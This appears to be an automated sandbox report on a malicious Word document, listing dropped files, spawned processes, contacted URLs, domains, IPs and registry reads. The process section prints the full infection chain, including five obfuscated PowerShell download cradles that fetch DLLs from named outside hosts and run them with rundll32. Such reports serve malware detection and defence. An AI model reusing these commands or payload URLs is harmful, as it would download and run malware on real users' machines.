Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
diagram-884.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: x, Template: Normal.dotm,
Last Saved By: x, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 16 10:44:00
2021, Last Saved Time/Date: Thu Sep 16 10:44:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security:
0
|
initial sample
|
 |
|
|
C:\ProgramData\pin.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1960F7F0-F768-4A99-BA9A-679D126DC5D5}.tmp
|
data
|
dropped
|
 |
|
|
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-884.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58
2021, mtime=Mon Aug 30 20:08:58 2021, atime=Thu Sep 16 22:58:17 2021, length=286720, window=hide
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EZUU6Z1EEHNESJOJTGM.temp
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GRS1X41I3E0W4529WXKM.temp
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RVAC7IF4RL0ITUO02ZRM.temp
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T629K64P5Q872I06B2KO.temp
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W3V0CVJZ98SWKPVTWYZJ.temp
|
data
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$agram-884.doc
|
data
|
dropped
|
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /k cscript.exe C:\ProgramData\pin.vbs
|
|
|
|
C:\Windows\System32\cscript.exe
|
cscript.exe C:\ProgramData\pin.vbs
|
|
|
|
C:\Windows\System32\cmd.exe
|
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr
|
|
|
|
C:\Windows\System32\cmd.exe
|
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr
|
|
|
|
C:\Windows\System32\cmd.exe
|
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr
|
|
|
|
C:\Windows\System32\cmd.exe
|
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr
|
|
|
|
C:\Windows\System32\cmd.exe
|
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject
Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX
=($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob';
$qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX
=($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob';
$qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX
=($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob';
$qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX
=($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob';
$qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX
=($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\ProgramData\www1.dll,ldr
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\ProgramData\www2.dll,ldr
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\ProgramData\www3.dll,ldr
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\ProgramData\www4.dll,ldr
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\ProgramData\www5.dll,ldr
|
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html
|
149.56.235.225
|
|
|
|
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.htmlPE
|
unknown
|
|
|
|
http://www.windows.com/pctv.
|
unknown
|
|
|
|
http://investor.msn.com
|
unknown
|
|
|
|
http://www.msnbc.com/news/ticker.txt
|
unknown
|
|
|
|
https://scriptcaseblog.com.br/
|
unknown
|
|
|
|
https://scriptcaseblog.com.br
|
unknown
|
|
|
|
http://crl.entrust.net/server1.crl0
|
unknown
|
|
|
|
https://srdm.in/0K6dTttd/ca.html
|
192.185.115.199
|
|
|
|
http://ocsp.entrust.net03
|
unknown
|
|
|
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
|
|
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
|
|
|
https://gvmedicine.com/c8lDPI
|
unknown
|
|
|
|
https://sharayuprakashan.com/90qJEVeD0VAw/ca.html
|
204.11.58.87
|
|
|
|
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
|
|
|
http://www.hotmail.com/oe
|
unknown
|
|
|
|
https://gvmedicine.com/c8lDPI7K/ca.html
|
204.11.58.87
|
|
|
|
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
|
|
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
|
|
|
http://www.icra.org/vocabulary/.
|
unknown
|
|
|
|
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
|
|
|
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
|
|
|
https://gvmedicine.com/c8lDPI7K/
|
unknown
|
|
|
|
http://investor.msn.com/
|
unknown
|
|
|
|
https://gvmedicine.com/c8lDPI7K/ca.htmlPE
|
unknown
|
|
|
|
http://www.piriform.com/ccleaner
|
unknown
|
|
|
|
http://www.%s.comPA
|
unknown
|
|
|
|
http://ocsp.entrust.net0D
|
unknown
|
|
|
|
https://gvmedicine.com/c8lDPI7
|
unknown
|
|
|
|
https://secure.comodo.com/CPS0
|
unknown
|
|
|
|
http://servername/isapibackend.dll
|
unknown
|
|
|
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
|
|
|
https://scriptcaseblog.com.br/8K
|
unknown
|
|
|
|
https://venturefiling.com/yP2brxfli/ca.html
|
204.11.58.87
|
|
|
|
http://www.piriform.com/ccleanerhttp://w
|
unknown
|
|
|
|
https://gvmedicine.com
|
unknown
|
|
There are 26 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
gvmedicine.com
|
204.11.58.87
|
|
|
|
srdm.in
|
192.185.115.199
|
|
|
|
scriptcaseblog.com.br
|
149.56.235.225
|
|
|
|
sharayuprakashan.com
|
204.11.58.87
|
|
|
|
venturefiling.com
|
204.11.58.87
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.56.235.225
|
scriptcaseblog.com.br
|
Canada
|
|
|
|
204.11.58.87
|
gvmedicine.com
|
United States
|
|
|
|
192.185.115.199
|
srdm.in
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
y)-
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
r*-
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
{+-
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
2E475
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
|
|
|
